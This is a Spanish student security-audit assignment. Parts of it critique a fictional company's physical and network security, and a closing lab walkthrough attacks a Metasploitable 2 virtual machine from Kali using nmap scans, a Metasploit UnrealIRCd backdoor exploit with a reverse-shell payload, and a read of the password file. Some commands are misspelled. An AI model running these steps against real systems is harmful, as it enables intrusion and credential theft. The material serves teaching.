  • 2. ÍNDICE 1. MEDIDAS DE SEGURIDAD PASIVA......................................................................1 2. ASEGURAR LA PRIVACIDAD ............................................................................3 3. DEMOSTRACIÓN VULNERABILIDADES ................................................................4
  • 3. Seguridad informática 2017-2018 Patricia Durán de Jesús 1 1. MEDIDAS DE SEGURIDAD PASIVA Aplicar medidas de seguridad pasiva en sistemas informáticos describiendo características de entornos y relacionándolas con sus necesidades.  Trabajas en una auditoría de seguridad informática. Llega un nuevo cliente que desea conocer la situación de su empresa en cuanto a seguridad informática y si es aceptable o podría mejorar. Durante la entrevista tomas las siguientes notas:  El edificio tiene un servicio de vigilancia a través de una empresa externa. Por reducción del presupuesto, ahora solo hay un vigilante que también atiende el edificio del otro lado de la calle. → Se necesita mayor seguridad. No se puede tener a un único vigilante y que encima debe estar vigilando dos edificios ya que la vigilancia no es igual de fiable y constante.  El CPD tiene otro vigilante, de otra compañía, que también atiende el teléfono de la centralita a partir de las 3, cuando termina el turno del recepcionista. → El centro de protección de datos debe estar bien protegido, no puede haber un vigilante que tenga 2 cargos más porque no presta la atención suficiente y al distraerse pueden haber posibles robos o alteraciones.  Para entrar al CPD, cada informático tiene una tarjeta particular, si bien hay una en el cajón de la mesa del vigilante para el personal de limpieza o por si ocurre una emergencia. → Cada tarjeta debe ser intransferible y no pueden tener acceso a cada tarjeta particular distintas personas al propietario de la misma. Además de que cada informático no debe tener acceso al CPD, solo los encargados del mismo.  Una vez a la semana se hace la copia de seguridad. Como solo disponen de un dispositivo de cinta, los cuatro servidores se reparten cada semana del mes. Dado que solo hay un vigilante para el CPD, las cintas se dejan dentro de la sala, cada una encima de su servidor (cada servidor tiene una cinta en exclusiva). → Las copias deben ser instantáneas ya que en el momento en que se hacen cambios, añaden o quitan cosas se pueden perder datos. Las cintas no pueden estar a plena vista y mucho menos encima de cada servidor, si alguien entrase a robar los datos, l tendría muy fácil ya que solo hay un vigilante. Se tiene que poner mayor vigilancia, realizar copias de seguridad
  • 4. Seguridad informática 2017-2018 Patricia Durán de Jesús 2 instantáneas, mejorar el método de las copias y guardarlas en un lugar seguro que no esté a la vista de cualquiera.  El edificio pertenece al patrimonio histórico y no admite reformas en la fachada. Por tanto, no ha sido posible instalar equipos de aire acondicionado en el CPD. Para combatir el calor que desprenden los ordenadores, las ventanas están siempre abiertas. Cada servidor tiene un disco duro de alta gama, que no ha fallado nunca. → Se necesita refrigeración, las ventanas no pueden estar abiertas, entran suciedad y polvo constantemente y eso genera más calor en los equipos, se debe instalar refrigeración y en caso de que no puedan por no admitir reformas, se deberá cambiar el CPD a otro edificio que si permita realizar los cambios necesarios.  Los servidores tienen doble fuente de alimentación, por si se estropea alguna. → Está bien e incluso deberían haber Sistemas de Alimentación Ininterrumpida.  El presidente y el contable tienen cada uno un portátil de la empresa. El disco duro de estas máquinas no está cifrado porque no se arriesgan al desastre que supondría olvidar la contraseña. → Cifrar el disco duro y cada equipo protegerlo con una contraseña bien elaborada, sin datos personales o relacionados con el trabajo o empresa.  Los ordenadores tienen dos usuarios: uno para las tareas normales y otro cuando necesitan realizar alguna instalación o modificar un parámetro del sistema operativo. Los empleados saben cuándo deben usar cada uno. → Los empleados no deben tener acceso a instalaciones o modificaciones de parámetros del sistema operativo. Eso puede ocasionar problemas, ya que pueden configurar o borrar algo que no deben o incluso instalar malware sin darse cuenta y crea vulnerabilidades. Los empleados deben tener un usuario en el que tengan permisos limitados.  Termináis por hoy la entrevista porque ha sido una reunión muy larga. Todavía no has redactado el informe final, pero ¿encuentras algo que mejorar? ¿Qué alternativa le puedes proponer? Cambiar la seguridad y forma de actuar de la empresa con lo ya indicado en los apartados anteriores. Modificaría los niveles de seguridad, copias de seguridad realizadas, etc.
  • 5. Seguridad informática 2017-2018 Patricia Durán de Jesús 3 2. ASEGURAR LA PRIVACIDAD Asegurar la privacidad de la información transmitida en redes informáticas describiendo vulnerabilidades e instalando software específico.  Al día siguiente continúa la entrevista: Tus nuevas notas son:  Hay una red wifi en la oficina que permite entrar en la red de ordenadores y salir a Internet. No tiene contraseña para que los clientes puedan utilizarla con total comodidad. → Deben de poner una contraseña, ya que no tenerla no hace que sea más cómodo si no que permite a personas externas a la empresa que puedan acceder sin ningún tipo de complejidad. Al menos teniendo contraseñas y diferenciando bien la red pública de la red privada de la empresa evitas posibles intrusos.  La mayoría de los ordenadores utilizan Windows XP, pero algunos empleados necesitan Windows 7, 8 o incluso 10 para correr ciertas aplicaciones. Como la empresa no puede afrontar la compra de nuevas licencias, están utilizando software pirata. → La empresa debe asumir el precio de unas licencias de Windows 10, por ejemplo, ya que es el más actual y tiene soporte técnico mientras que Windows XP ya no. En caso de no poder asumir el precio, podrían pasar a un software libre.  En cuanto al antivirus, cada empleado pone el que más le gusta y se los pasan entre ellos mediante dispositivos USB. → Se debería tener un mismo antivirus para todos los equipos y estar terminantemente prohibido el uso de USB ajenos o propios de los trabajadores, ya que existe el riesgo de que ese USB esté infectado con malware e infectase a toda la empresa.  Los ordenadores que hacen de servidores tienen activadas las actualizaciones automáticas de todas las aplicaciones y el sistema operativo, pero en los ordenadores de empleados no se hace porque han visto que se satura la conexión a Internet. → Se deben actualizar siempre que sea necesario ya que en las actualizaciones existen modificaciones del software que quizá implementen mayor seguridad o arreglen fallos que puedan ocasionar un agujero de seguridad en un futuro lejano, o incluso cercano.  La mayoría de los equipos de red son switch y routers, pero algunos despachos todavía tienen hubs porque son fiables y el ancho de banda es suficiente. → Los hubs generan mucho tráfico y consumen más
  • 6. Seguridad informática 2017-2018 Patricia Durán de Jesús 4 ancho de banda, aunque son más rápidos, no son tan fiables como pueden ser un switch o un router-  Para entrar a la red desde Internet utilizan Hamachi, un servicio gratuito y muy sencillo de instalar. → Hamachi tiene como desventajas los problemas con los enrutadores, ya que se generan conflictos. Otra opción para tener una red privada sería OpenVPN.  El servidor web está instalado sobre una máquina con sistema operativo Linux Ubuntu Server 9.04. → Cambiar la versión de Linux Ubuntu Server a una más actualizada para mantenernos al día en actualizaciones tanto a nivel de seguridad como software en general. Últimas versiones: Ubuntu Server 16.04.3 LTS y Ubuntu Server 17.04 3. DEMOSTRACIÓN VULNERABILIDADES Completar el informe con una demo en la que le harás ver al cliente cómo se pueden aprovechar las vulnerabilidades de sus sistemas. Para ello vas a realizar la práctica de INCIBE “Explotando un sistema” perteneciente al capítulo “Fundamentos del análisis de sistemas”, siguiendo el correspondiente vídeo-tutorial de YouTube. Vas a necesitar dos máquinas virtuales, una con kali-linux (máquina atacante) y la otra con metasploitable 2 (máquina vulnerable). Primero comprobaremos la visibilidad entre las máquinas, tanto con kali-linux como con la máquina vulnerable, la metasploitable. Podemos comprobar que la IP de la máquina vulnerable es 192.168.1.165 y la máquina atacante 192.168.1.166
  • 7. Seguridad informática 2017-2018 Patricia Durán de Jesús 5 Para comprobar la visibilidad entre ambas, haremos ping desde la máquina atacante a la máquina vulnerable: - Ping 192.168.1.165 Utilizaremos Nmap para escanear la IP de la red (192.168.1.0) para encontrar los equipos encendidos en la red.
  • 8. Seguridad informática 2017-2018 Patricia Durán de Jesús 6 Procederemos a escanear los puertos de nuestra máquina con nmap –sT –O 192.168.1.166 (IP de la máquina atacada) Lo siguiente que haremos será: Nmap –sT –sV (IP de la máquina vulnerable, atacada)
  • 9. Seguridad informática 2017-2018 Patricia Durán de Jesús 7 El siguiente paso a realizar será “telnet (IP del objetivo) (Puerto de telnet). Una vez hecho, podremos poner herramientas como FTP o SSH. El procedimiento es abrir la consola e introducir los comandos: - ftp <dirección IP> - telnet <dirección IP> - ssh <dirección IP>
  • 10. Seguridad informática 2017-2018 Patricia Durán de Jesús 8
  • 11. Seguridad informática 2017-2018 Patricia Durán de Jesús 9 Abriremos una consola del sistema e introduciremos estos comandos: Msfconsole Use exploit/unit/irc/unreal_ircd_3281_backdoor Set RHOST <IP> Set payload <payload> (cmd/unix/reverse) Set LHOST <IP> Exploit
  • 12. Seguridad informática 2017-2018 Patricia Durán de Jesús 10 Por ultimo abriremos una consola del Sistema e introduciremos este comando: Is Cat etc/psswd